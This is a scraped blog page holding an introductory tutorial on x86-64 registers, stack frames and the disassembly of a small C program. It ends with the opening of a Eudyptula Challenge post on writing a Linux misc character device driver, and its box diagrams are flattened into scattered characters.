─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ 1 ─ ─ ─ ─ ─ 6 ─ ─ ─ ─ ─ - ─ A ─ B ─ C ─ D ─ b ─ X ─ X ─ X ─ X ─ i ─ ─ ─ ─ ─ t ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ► ─ ─ ─ ─ ─ ┐ │ ┤ │ ┤ │ ┤ │ ┘ These 16-bit registers were partitioned into 2 sections, higher address (H) and lower address (L).\nFollowing that, few years later, 16-bit registers were extended to support 32 bit softwares, adding an E prefix. And after that adding a R prefix for 64 bit registers.\nDiagram below shows how these registers are mapped to support previous designs/architectures.\n◄ ┌ │ └ ─ ─ ─ ─ ─ ─ ─ ─ ( ─ ─ ─ T ─ ─ ─ h ─ ─ ─ i ─ ─ ─ s ─ ─ ─ ─ ─ ─ 3 ─ ─ ─ 2 ─ ─ ─ - ─ ─ ─ b ─ ─ ─ i ─ ─ ─ t ─ ─ ─ ─ ─ ─ s ─ ─ ─ e ─ ─ ─ c ─ ─ ─ t ─ ─ ─ i ─ ─ ─ o ─ ─ ─ n ─ ─ ─ ─ ─ ─ h ─ ─ ─ a ─ ─ ─ s ─ ─ ─ ─ ─ ─ n ─ ─ ─ o ─ ─ ─ ─ ─ ─ n ─ ─ ─ a ─ ─ ─ m ─ ─ ─ e ─ ─ ) ─ ─ ─ 6 ─ ─ 4 ─ ─ ─ ─ ◄ ┌ │ └ - ┬ │ ┴ ─ ─ ─ ─ ─ ─ ─ ─ b ─ ─ ─ ─ ─ i ─ ─ ─ ─ ─ t ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ( ─ ─ ─ ─ ─ R ─ ─ ─ ─ ─ A ─ ─ ─ ─ ─ X ─ ─ ─ ─ ─ ) ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ 3 ─ ─ ─ ─ ─ 2 ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ b ─ ─ ─ ─ ─ ◄ ┌ │ └ i ─ E ─ ─ ─ E ─ ─ ─ ─ t ─ A ─ ─ ─ A ─ ─ ─ ─ ─ X ─ ─ ─ X ─ ─ ─ ─ ( ─ ─ ─ ─ ─ ─ ─ ─ E ─ ─ ─ ─ ─ ─ ─ A ─ A ─ ─ ─ ─ ─ ─ H ─ X ─ ─ ─ ─ ─ 1 ─ ─ ) ─ ─ ─ ─ ─ 6 ─ ─ ─ ─ ─ ─ ─ ─ ┌ │ └ - ─ ─ ─ ─ ─ ─ ─ ─ ◄ ─ ─ b ┬ │ ┴ ─ ─ ─ ─ ─ ─ ─ ─ ─ i ─ ─ ─ ─ ─ ─ ─ ─ 8 ─ ─ t ─ ─ ─ ─ ─ ─ ─ ─ - ─ ─ ( ─ ─ ─ ─ ─ ─ ─ ─ b ─ A ─ A ─ ─ ─ ─ ─ ─ ─ ─ i ─ ─ X ─ A ─ ─ ─ ─ ─ ─ ─ t ─ ─ ) ─ L ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ► ┐ │ ┘ ► ─ ─ ► ─ ─ ► ─ ─ ┐ │ ┘ ┐ │ ┘ ┐ │ ┘ Nowadays, 64-bit and 32-bit systems are very common and can be easily found. Knowing this is very important to reverse engineer arithmatic and logic calculations from any disassembly code.\nApart from these general register, there are 3 special purpose registers - ebp, esp and eip. These registers are generally used to point to different memory locations of the stack. There are some times when we need to store the values of these registers on to the stack (Another kind of memory area used by processes). We\u0026rsquo;ll see some of those cases as we go further.\nStack is a data structure in memory which operates with 2 operations - push and pop. Push adds an element to the top of the stack and pop removes the top element of the stack.\nEach element on the stack has an assigned stack address which can be used to refer any location on the stack. The stack is upside down - means that the stack grows towards the lower memory addresses.\nH i L g o h w A A d d d d r r e S e s S t S s s t a t s a c a c k c k k F F r F r ▲ │ │ a │ │ ▼ r a m a m e m ▲ │ │ e │ │ ▼ ▲ │ │ e │ │ ▼ 2 1 3 ┌ │ │ │ │ │ │ ├ │ │ │ │ │ │ ├ │ │ │ │ │ │ ├ │ │ │ │ ─ ─ ─ ─ ─ ─ ─ ─ ─ F ─ ─ ─ ─ u ─ F ─ F ─ ─ n ─ u ─ u ─ ─ c ─ n ─ n ─ ─ ─ c ─ c ─ ─ 1 ─ ─ ─ ─ ─ 2 ─ 3 ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┐ │ │ │ │ │ │ ┤ │ │ │ │ │ │ ┤ │ │ │ │ │ │ ┤ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ ▼ S G T L t r o o a o w w c w a k s r A d d s d r e s s Whenever a function is called it creates its stack frame, and all the local variables for that function will be stored in that function\u0026rsquo;s stack frame. This introduces the need to track 2 values for the current stack frame.\nWhat is the base of the stack frame? Where did the stack frame start? What is the top most location of the stack frame? How much the stack has grown? These are tracked by 2 special purpose registers - rbp (64-bit base pointer register) and rsp (64-bit stack pointer register) respectively.\nH L i o g w h A A d d d d r r e e s s s s S S t S S t a t t a c a a c k c c k k k F F r F F r ▲ │ │ a │ │ ▼ r r a m a ▲ │ │ a │ │ ▼ m e m m ▲ │ │ e │ │ ▼ ▲ │ │ e │ │ ▼ e 2 1 3 4 ┌ │ │ │ │ │ │ ├ │ │ │ │ │ │ ├ │ │ │ │ │ │ ├ │ │ │ │ ─ ─ ─ ─ ─ ─ ─ ─ ─ F ─ ─ ─ ─ u ─ F ─ F ─ F ─ n ─ u ─ u ─ u ─ c ─ n ─ n ─ n ─ ─ c ─ c ─ c ─ 1 ─ ─ ─ ─ ─ 2 ─ 3 ─ 4 ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┐ │ │ │ │ │ │ ┤ │ │ │ │ │ │ ┤ │ │ │ │ │ │ ┤ │ │ │ │ ◄ ◄ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ r r b s p p Let\u0026rsquo;s take another example to understand how this would work for a regular C program.\n#include \u0026lt;stdio.h\u0026gt; int func2(int a, int b, int c, int d, int e, int f, int g, int h) { int z = 0; int sum = a + b + c + d + e + f + g + h; char ch = \u0026#39;A\u0026#39;; return sum; } void func1() { int x = func2(1, 2, 3, 4, 5, 6, 7, 8); } int main(){ func1(); } This is roughly what the execution flow of the above program will look like\u0026hellip;\nmain() calls func1() function without any arguments. func1() function allocates some memory for int x and then calls func2() functions with a single integer type argument. func2() function creates some local variables - both with hardcoded value and using passed arguments. And then returns a variable back to func1(). Finally the control is passed back to main(). If you visualise the stack just before the main() function is loaded on stack.. the stack will be something like this:-\n# # B e S p f t r o a e r c v e k i o m f u a r s i a n m f e u s n t f c a o t r r i t o e n d e ┌ │ │ │ │ x ─ e ─ c ─ u ─ t ─ i ─ n ─ g ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┐ │ │ │ │ ◄ ◄ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ r r b s p p After this, the main() function loads its variables on the stack.. this will cause the return address to be loaded on to the stack, which will be used once the main() function has completed it\u0026rsquo;s execution\u0026hellip; This is the address which tells where to go back once the main() function returns. Visually the stack will look something like this.\nS p t r a e c v k i o f u r s a m f e u n f c o t r i o n ┌ │ │ │ │ │ ─ ─ r ─ e ─ t ─ u ─ r ─ n ─ ─ a ─ d ─ d ─ r ─ e ─ s ─ s ─ ─ ─ ─ ┐ │ │ │ │ │ ◄ ─ ─ ─ ─ ─ ─ ─ r b p ◄ ─ ─ ─ ─ ─ ─ ─ r s p Notice that the rbp and rsp are also moved\u0026hellip; rsp will move where the stack\u0026rsquo;s top is\u0026hellip; and rbp will point to the base of the current stack frame. This is what the loading of a function looks like. This is called Prologue\nNow the rip (64-bit instruction pointer) will point to main() function\u0026rsquo;s code block and will execute those instructions one by one. This will push more values to stack as required\u0026hellip; not all things are needed to be added to stack. We only push those values to stack which we need to save for later use and then pop when it is no longer required.\nLooking at the disassembly of main() function will help us to understand more what will be added to stack.\n0000000000001153 \u0026lt;main\u0026gt;: 1153: 55 push rbp 1154: 48 89 e5 mov rbp,rsp 1157: b8 00 00 00 00 mov eax,0x0 115c: e8 da ff ff ff call 113b \u0026lt;func1\u0026gt; 1161: b8 00 00 00 00 mov eax,0x0 1166: 5d pop rbp 1167: c3 ret Here, the above 2 lines make what we call Prologue. This pushes previous rbp to stack (stores returning point) and then updates the rbp with current rsp (stack pointer) value.\nthen it moves 0x00 to eax register\u0026hellip; Purpose of this is to reset eax register as 0 so that when the func1 returns, we are sure that it is not a garbage value. Remember:- eax is another general purpose register that is used by called functions to save the return value. This then can be read by the caller function to know what that function returned.\nAfter reseting eax, it calls func1() function\u0026hellip; this will transfer the control to func1().\n000000000000116a \u0026lt;func1\u0026gt;: 116a: 55 push rbp 116b: 48 89 e5 mov rbp,rsp 116e: 48 83 ec 10 sub rsp,0x10 1172: 6a 08 push 0x8 1174: 6a 07 push 0x7 1176: 41 b9 06 00 00 00 mov r9d,0x6 117c: 41 b8 05 00 00 00 mov r8d,0x5 1182: b9 04 00 00 00 mov ecx,0x4 1187: ba 03 00 00 00 mov edx,0x3 118c: be 02 00 00 00 mov esi,0x2 1191: bf 01 00 00 00 mov edi,0x1 1196: e8 7e ff ff ff call 1119 \u0026lt;func2\u0026gt; 119b: 48 83 c4 10 add rsp,0x10 119f: 89 45 fc mov DWORD PTR [rbp-0x4],eax 11a2: 90 nop 11a3: c9 leave 11a4: c3 ret func1() will then store the previous (main function\u0026rsquo;s) rbp value to stack.. and update the new base pointer with stack pointer\u0026rsquo;s value. At this point our stack will look something like below:-\n┌ │ │ │ │ │ │ │ │ │ │ ─ ─ ─ r r ─ e e ─ t t ─ u u ─ r r ─ n n ─ ─ a a ─ d d ─ d d ─ r r ─ e e ─ s s ─ s s ─ ─ o o ─ f f ─ ─ p m ─ r a ─ e i ─ v n ─ ─ f f ─ u u ─ n n ─ c c ─ ─ ─ ┐ │ │ │ │ │ │ │ │ │ │ ◄ ─ ─ ─ ─ ─ ─ ─ r b p ◄ ─ ─ ─ ─ ─ ─ ─ r s p Now after the prologue instructions, the instruction pointer (rip) is at instruction 113f \u0026ndash;\u0026gt; sub rsp,0x10. This subtracts 0x10 from rsp that will increase the gap betweem rbp and rsp resulting in some memory space in the stack frame. This does not overwrite the stack values, but this will create a sense of cleaning the messed up stack.\nh i g L h o w A d A d d r d r ┌ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ ─ ─ ─ r r ─ e e ─ t t ─ u u ─ r r ─ n n ─ ─ a a ─ d d ─ d d ─ r r ─ e e ─ s s ─ s s ─ ─ o o ─ f f ─ ─ p m ─ r a ─ e i ─ v n ─ ─ f f ─ u u ─ n n ─ c c ─ ─ ─ ┐ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ ◄ ◄ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ r r b s p p 0 x 1 0 This allocated space is now used to create local variables for the function func1()\u0026hellip; For our case, that will be int x. Integers use only 4 bytes of space for themselves, but gcc by default allocates memory in 16-bytes chunk. That is the reason for rsp to move 0x10 (16) bytes downwards. We can change this behaviour by explicitely passign -mpreferred-stack-boundary=n flag to gcc. Read more about this here: Stack allocation, padding, and alignment\nAfter the memory is allocated on stack for local variables, it is time to call func2 with all the arguments. According to the calling convention defined for x86 assembly instructions, whenever a function is called, it\u0026rsquo;s arguments are first loaded into predefined registers in specific positional order. But due to limitations of general purpose registers, only first 6 arguments are loaded to registers and the rest are pushed to stack.\nFor this case, there are in total 8 arguments\u0026hellip; out of which 6 will be stored in the general purpose registers and the rest 2 will be pushed to stack.\nh L i o g w h A A d d d d r r ┌ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ ─ ─ ─ r r 0 0 ─ e e x x ─ t t 8 7 ─ u u ─ r r ─ n n ─ ─ a a ─ d d ─ d d ─ r r ─ e e ─ s s ─ s s ─ ─ o o ─ f f ─ ─ p m ─ r a ─ e i ─ v n ─ ─ f f ─ u u ─ n n ─ c c ─ ─ ─ ┐ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ . ◄ . ◄ ─ . ─ ─ . ─ ─ . ─ ─ . ─ ─ . ─ ─ . ─ ─ . ─ . . r . r b . s p . p . . . . 0 x 1 0 When more values are pushed to stack, the stack pointer moves more towards lower addresses and the stack frame grows. Here these 2 values are added to stack and then the function is called\u0026hellip;. this will cause the return address to be pushed to stack too (So that control can come back to this location.)\nh i g L h o w A d A d d r d r ┌ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ ─ ─ ─ r r 0 0 r ─ e e x x e ─ t t 8 7 t ─ u u u ─ r r r ─ n n n ─ ─ a a a ─ d d d ─ d d d ─ r r r ─ e e e ─ s s s ─ s s s ─ ─ o o o ─ f f f ─ ─ p m f ─ r a u ─ e i n ─ v n c ─ 1 ─ f f ─ u u f ─ n n u ─ c c n ─ c ─ ─ ┐ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ . ◄ . ◄ ─ . ─ ─ . ─ ─ . ─ ─ . ─ ─ . ─ ─ . ─ ─ . ─ . . r . r b . s p . p . . . . 0 x 1 0 After this, the instruction pointer starts pointing towards the instructions of the func2 function.\n0000000000001119 \u0026lt;func2\u0026gt;: 1119: 55 push rbp 111a: 48 89 e5 mov rbp,rsp 111d: 89 7d ec mov DWORD PTR [rbp-0x14],edi 1120: 89 75 e8 mov DWORD PTR [rbp-0x18],esi 1123: 89 55 e4 mov DWORD PTR [rbp-0x1c],edx 1126: 89 4d e0 mov DWORD PTR [rbp-0x20],ecx 1129: 44 89 45 dc mov DWORD PTR [rbp-0x24],r8d 112d: 44 89 4d d8 mov DWORD PTR [rbp-0x28],r9d 1131: c7 45 f8 00 00 00 00 mov DWORD PTR [rbp-0x8],0x0 1138: 8b 55 ec mov edx,DWORD PTR [rbp-0x14] 113b: 8b 45 e8 mov eax,DWORD PTR [rbp-0x18] 113e: 01 c2 add edx,eax 1140: 8b 45 e4 mov eax,DWORD PTR [rbp-0x1c] 1143: 01 c2 add edx,eax 1145: 8b 45 e0 mov eax,DWORD PTR [rbp-0x20] 1148: 01 c2 add edx,eax 114a: 8b 45 dc mov eax,DWORD PTR [rbp-0x24] 114d: 01 c2 add edx,eax 114f: 8b 45 d8 mov eax,DWORD PTR [rbp-0x28] 1152: 01 c2 add edx,eax 1154: 8b 45 10 mov eax,DWORD PTR [rbp+0x10] 1157: 01 c2 add edx,eax 1159: 8b 45 18 mov eax,DWORD PTR [rbp+0x18] 115c: 01 d0 add eax,edx 115e: 89 45 fc mov DWORD PTR [rbp-0x4],eax 1161: c6 45 f7 41 mov BYTE PTR [rbp-0x9],0x41 1165: 8b 45 fc mov eax,DWORD PTR [rbp-0x4] 1168: 5d pop rbp 1169: c3 ret This is the biggest function we have seen so far\u0026hellip; We already know the prologue that covers the first 2 instructions of this assembly code. Let\u0026rsquo;s read and try to understand further instructions. Before starting that, let\u0026rsquo;s see how our stack looks like after this function\u0026rsquo;s prologue.\nh i g L h o w A d A d d r d r ┌ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ ─ ─ ─ r r 0 0 r ─ e e x x e ─ t t 8 7 t ─ u u u ─ r r r ─ n n n ─ ─ a a a ─ d d d ─ d d d ─ r r r ─ e e e ─ s s s ─ s s s ─ ─ o o o ─ f f f ─ ─ p m f ─ r a u ─ e i n ─ v n c ─ 1 ─ f f ─ u u f ─ n n u ─ c c n ─ c ─ ─ ┐ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ . . . . ◄ . . ─ . . ─ ─ ─ 0 ─ x ─ 1 ─ 0 r s p ◄ ─ ─ ─ ─ ─ ─ ─ r b p It is a good idea to visualize how the stack will look after this function has been loaded and all the required memory is allocated to it.\nL O W H A I D G D H R A D D R r r r r r b b b b b p p p p p - - - - - 0 0 0 0 0 x x x x x 0 0 0 1 2 4 8 9 4 8 ┌ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ ─ ─ ─ r r 0 0 r ─ e e x x e ─ t t 8 7 t ─ u u u ─ r r r ─ n n n ─ ─ a a a ─ d d d ─ d d d ─ r r r ─ e e e ─ s s s ─ s s s ─ ─ o o o ─ f f f ─ ─ p m f ─ r a u ─ e i n ─ v n c ─ 1 ─ f f ─ u u f ─ n n u ─ c c n ─ c ─ ─ ┐ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ . . . . . . ◄ . . . . ─ . . . . ─ . . ─ . . ─ 0 ─ x ─ L 1 ─ o 0 c a r l b p v a r i a b l e s f o r p a s s e d a r g u m e n t s Now we can understand easily which variables are stored where on the stack. The previously passed positional arguments are loaded to stack after the local variables.\n111d: 89 7d ec mov DWORD PTR [rbp-0x14],edi ; 0x1 1120: 89 75 e8 mov DWORD PTR [rbp-0x18],esi ; 0x2 1123: 89 55 e4 mov DWORD PTR [rbp-0x1c],edx ; 0x3 1126: 89 4d e0 mov DWORD PTR [rbp-0x20],ecx ; 0x4 1129: 44 89 45 dc mov DWORD PTR [rbp-0x24],r8d ; 0x5 112d: 44 89 4d d8 mov DWORD PTR [rbp-0x28],r9d ; 0x6 These locations are in continous order with 4-bytes of memory space for each integer. This is the optimization done by gcc because it knows what will be the size of the passed arguments.\n1131: c7 45 f8 00 00 00 00 mov DWORD PTR [rbp-0x8],0x0 Then, 0x0 is stored to rbp-0x8. This will be one of our local variables. Then it adds all the passed arguments and save that to another local variable.\n1138: 8b 55 ec mov edx,DWORD PTR [rbp-0x14] 113b: 8b 45 e8 mov eax,DWORD PTR [rbp-0x18] 113e: 01 c2 add edx,eax ; var_edx = 0x1 + 0x2 1140: 8b 45 e4 mov eax,DWORD PTR [rbp-0x1c] 1143: 01 c2 add edx,eax ; var_edx = var_edx + 0x3 1145: 8b 45 e0 mov eax,DWORD PTR [rbp-0x20] 1148: 01 c2 add edx,eax ; var_edx = var_edx + 0x4 114a: 8b 45 dc mov eax,DWORD PTR [rbp-0x24] 114d: 01 c2 add edx,eax ; var_edx = var_edx + 0x5 114f: 8b 45 d8 mov eax,DWORD PTR [rbp-0x28] 1152: 01 c2 add edx,eax ; var_edx = var_edx + 0x6 1154: 8b 45 10 mov eax,DWORD PTR [rbp+0x10] 1157: 01 c2 add edx,eax ; var_edx = var_edx + 0x7 1159: 8b 45 18 mov eax,DWORD PTR [rbp+0x18] 115c: 01 d0 add eax,edx ; var_eax = var_edx + 0x8 115e: 89 45 fc mov DWORD PTR [rbp-0x4],eax ; int sum = var_eax Once all the arguments are added it stores that to another local variable. Another point to note here is that the first 6 arguments were stored to stack from general purpose registers and the rest 2 arguments (that were already on stack) were directly referenced from the stack\u0026hellip; These values were added to stack before the previous function return value so they are referenced by rbp+0x10 and rbp+18.\nVisually this part of the stack will look something like this\u0026hellip;\nr r r r b b b b p p p p + + + - 0 0 0 0 x x x x 1 1 0 0 8 0 8 4 │ │ │ │ │ │ │ │ │ 0 0 r x x e 8 7 t u r n a d d r e s s o f f u n c 1 f u n c │ │ │ │ │ │ │ │ │ . . ◄ . ─ . ─ ─ ─ ─ ─ ─ r b p Now comes the third local variable, char ch='A'\u0026hellip; This is the next instruction in our disassembly\n1161: c6 45 f7 41 mov BYTE PTR [rbp-0x9],0x41 ; 0x41 = 65 = A Now we can take a look again to the stack and understand what memory locations are for what purposes\u0026hellip;\n( ( S ( F e T i c h r o i s n r t d d L o h l l l w i o o o g c c c A h a a a d l l l d A r d v v v d a a a r r r r ) ) ) r r r r r b b b b b p p p p p - - - - - 0 0 0 0 0 x x x x x 0 0 0 1 2 4 8 9 4 8 ┌ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ ─ ─ ─ r r 0 0 r 0 0 0 0 0 0 ─ e e x x e 3 0 A x x x x x x ─ t t 8 7 t 6 1 2 3 4 5 6 ─ u u u ─ r r r ─ n n n ─ ─ a a a ─ d d d ─ d d d ─ r r r ─ e e e ─ s s s ─ s s s ─ ─ o o o ─ f f f ─ ─ p m f ─ r a u ─ e i n ─ v n c ─ 1 ─ f f ─ u u f ─ n n u ─ c c n ─ c ─ ─ ┐ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ . . . . . . ◄ . . . . ─ . . . . ─ . . ─ . . ─ 0 ─ x ─ L 1 ─ o 0 c a r l b p v a r i a b l e s f o r p a s s e d a r g u m e n t s Then we set eax to the value we want to return back to the caller function func1().\n1165: 8b 45 fc mov eax,DWORD PTR [rbp-0x4] And finally, we pop the rbp from stack and move to the instruction in the previous function from where we left the execution. This is called Epilogue\n1168: 5d pop rbp 1169: c3 ret After this, the stack will look something like as shown below:\nh i g L h o w A d A d d r d r ┌ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ ─ ─ ─ r r 0 0 ─ e e x x ─ t t 8 7 ─ u u ─ r r ─ n n ─ ─ a a ─ d d ─ d d ─ r r ─ e e ─ s s ─ s s ─ ─ o o ─ f f ─ ─ p m ─ r a ─ e i ─ v n ─ ─ f f ─ u u ─ n n ─ c c ─ ─ ─ ┐ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ │ . ◄ . ─ . ◄ ─ . ─ ─ . ─ ─ . ─ ─ . ─ ─ . ─ ─ . ─ . ─ . r . b . r p . s . p . . . 0 x 1 0 And in disassembly code, Instruction pointer will be pointing to the next instruction after func2() function call.\n000000000000116a \u0026lt;func1\u0026gt;: 116a: 55 push rbp 116b: 48 89 e5 mov rbp,rsp 116e: 48 83 ec 10 sub rsp,0x10 1172: 6a 08 push 0x8 1174: 6a 07 push 0x7 1176: 41 b9 06 00 00 00 mov r9d,0x6 117c: 41 b8 05 00 00 00 mov r8d,0x5 1182: b9 04 00 00 00 mov ecx,0x4 1187: ba 03 00 00 00 mov edx,0x3 118c: be 02 00 00 00 mov esi,0x2 1191: bf 01 00 00 00 mov edi,0x1 1196: e8 7e ff ff ff call 1119 \u0026lt;func2\u0026gt; 119b: 48 83 c4 10 add rsp,0x10 \u0026lt;--- instruction pointer 119f: 89 45 fc mov DWORD PTR [rbp-0x4],eax 11a2: 90 nop 11a3: c9 leave 11a4: c3 ret This will then increase the stack pointer by 0x10 and save return value to a local variable at rbp-0x4 location\u0026hellip;and then exit. This is epilogue for func1() function. And after leave and ret instructions the stack will look like as shown below:\nh L i o g w h A A d d d d r r ┌ │ │ │ │ │ │ │ ─ ─ ─ r ─ e ─ t ─ u ─ r ─ n ─ ─ a ─ d ─ d ─ r ─ e ─ s ─ s ─ ─ o ─ f ─ ─ p ─ r ─ e ─ v ─ ─ f ─ u ─ n ─ c ─ ─ ─ ┐ │ │ │ │ │ │ │ ◄ ◄ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ r r b s p p And instruction pointer will be pointing to the next instruction in main() function.\n00000000000011a5 \u0026lt;main\u0026gt;: 11a5: 55 push rbp 11a6: 48 89 e5 mov rbp,rsp 11a9: b8 00 00 00 00 mov eax,0x0 11ae: e8 b7 ff ff ff call 116a \u0026lt;func1\u0026gt; 11b3: b8 00 00 00 00 mov eax,0x0 \u0026lt;--- instruction pointer 11b8: 5d pop rbp 11b9: c3 ret This instruction will simply set the return value for this function as 0x0 and then will pop rbp from stack. This will collapse the main() function\u0026rsquo;s stack frame and in the next instruction it\u0026rsquo;ll return the control to whatever function called the main() function.\nSome most common instructions Most of the times, you\u0026rsquo;ll see similar instructions being executed like push, pop, ret, mov, add, sub, etc.. Let\u0026rsquo;s understand some of those which we will be seeing most of the times.\npush : This simply adds the value to the top of the stack and then decrements the stack pointer. (Decrementing stack pointer means growing the stack, since stack is upside down and grows towards lower addresses)\npop : Opposite to push instruction, this removes the top of the stack and increments the stack pointer.\nmov : This is used to move some values from one location to another. This instruction is quite versatile and can move the values from/to register, stack memory locations, etc\u0026hellip; For example,\nmov rax, 0x10 will move 0x10 constant value to rax register.\nmov rdi, rax will move the rax register value to rdi register.\nmov rdi, [rax] will move the value pointer by rax to rdi register. You can think of this as dereference pointer in C.\nmov [rbp-0x8], rax will move the value from rax register to memory location poined by rbp-0x08.\nadd and sub : adds and substracts one value from another value. For example, add rax, 0x10 will add 0x10 to value at rax register. And the result will be stored in rax register. sub rax, 0x10 wil subtract 0x10 from value at rax register. And the result will be stored in rax register. lea : this Loads Effective Address (lea) to any destination. This is used to copy the address of the memory location to a register/stack. For example, lea eax, rbp-0x8 will load the address of rbp-0x8 into eax register.\ncmp : This (compare instruction) is equivalent to sub instruction, just instead of saving the result into the first argument, it updates a flag. If the value is less then 0 then the flag is set to 1 else 0. For example, cmp 1, 3 will result in -2 and this will set the flag to be 1.\njmp : Compare instructions are usually followed by jump instructions. This will check the above set flag and jump to the address specified in the argument accordingly. There are many types of jump instructions like jump equal (je), jump not equal (je), jump greater (jg), jump less (jl), etc.. This instruction actually manipulates the instruction pointer to make the jump. If the condation matches then it\u0026rsquo;ll take the jump by setting the instruction pointer to the memory location from the argument, else it\u0026rsquo;ll change the instruction pointer to point to the next statement.\ncall : This instruction calls a function. This is equivalent to push eip (save the next instruction on stack) followed by jmp func.\nleave/ret : This is called at the end of every function. This destroys the current stack frame by incrementing the stack pointer or by moving the stack pointer(rsp) to the same location pointer by base pointer (rbp) and then poping the base pointer. This will make the previous return address the top of the stack which will be used by ret to return to that address by setting eip to that address and eventually pop the return address from the stack.\nConclusion You\u0026rsquo;re all set! This all could be a lot to take in all at once. But atleast you now have a rudimentary grasp of how a C code is compiled and how everything functions at the low level. I hope you now have enough information and self-assurance to begin your adventures into reverse engineering.\nHave fun!! ✌️\n","permalink":"https://ayedaemon.github.io/post/2022/09/intro-to-re/","summary":"Steps to generate a binary When we write a program using a language like C, it is not C source code which really gets executed. This C code passes through many steps and finally a binary file is generated out of it. This binary file is what gets executed on any computer.\nThere are many steps through which a C code is converted into a binary file:-\nPre-processing Compilation Assemble Linking Let\u0026rsquo;s follow these steps one by one to understand what they do to the C code and how a binary is generated via this.","title":"Intro to RE: C : part-1"},{"content":"This is Task 06 of the Eudyptula Challenge ------------------------------------------ Nice job with the module loading macros, those are tricky, but a very valuable skill to know about, especially when running across them in real kernel code. Speaking of real kernel code, let\u0026#39;s write some! The task this time is this: - Take the kernel module you wrote for task 01, and modify it to be a misc char device driver. The misc interface is a very simple way to be able to create a character device, without having to worry about all of the sysfs and character device registration mess. And what a mess it is, so stick to the simple interfaces wherever possible. - The misc device should be created with a dynamic minor number, no need running off and trying to reserve a real minor number for your test module, that would be crazy. - The misc device should implement the read and write functions. - The misc device node should show up in /dev/eudyptula. - When the character device node is read from, your assigned id is returned to the caller. - When the character device node is written to, the data sent to the kernel needs to be checked. If it matches your assigned id, then return a correct write return value. If the value does not match your assigned id, return the \u0026#34;invalid value\u0026#34; error value. - The misc device should be registered when your module is loaded, and unregistered when it is unloaded. - Provide some \u0026#34;proof\u0026#34; this all works properly. Device drivers?? When a user adds a new part to a computer system, such a printer, the computer doesn\u0026rsquo;t immediately understand how to connect with it and identify it. This requires some sort of translator that can mediate between the component and our operating system/Computer. These translators are called device drivers. The operating system and other software are typically instructed on how to interface with another piece of hardware by device drivers, which are typically extremely small pieces of software.\nFor example, In some laptops there is a dedicated CAPSLOCK LED, which toggles to indicate the state of the key itself. It seems like a really easy and straightforward concept. A key and a led are there; when the key is pressed, the led toggles; when the key is pressed again, the led toggles once more. However, There is lot more going on than what meets the eye.\nWhen the CAPSLOCK key is pressed, userspace application that connects with the relevant mediator/translator and transmits the message to it. The translator then manages this message, analyses it, and then executes some operations on the associated hardware device (LED).\n─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ┌ │ │ │ └ ─ ┌ │ │ │ └ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ D ─ ─ ─ ─ ─ ─ e ─ ─ ┌ │ └ ─ P ─ ─ ─ v ─ ─ ─ ─ ─ r ─ ─ ─ i ─ ─ ─ ─ ─ o ─ ─ ─ c ─ ─ ─ ─ ─ g ─ ─ ─ e ─ ─ ─ L ─ ─ r ┬ │ │ ┼ │ │ ▼ ┬ │ │ ┼ │ ▼ E ─ ─ a ─ ─ ─ D ─ ─ ─ D ─ ─ m ─ ─ ─ r ─ ─ ─ ─ ─ ─ ─ ─ i ─ ─ ─ ─ ─ ─ ─ ─ v ─ ─ ─ ─ ─ ─ ─ ─ e ─ ─ ─ ─ ─ ─ ─ ─ r ─ ─ ┐ │ ┘ ─ ─ ─ ─ ─ ─ ┐ │ │ │ ┘ ─ ─ ─ ─ ─ ┐ │ │ │ ┘ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ ─ U ─ ─ H S ─ K ─ A E E 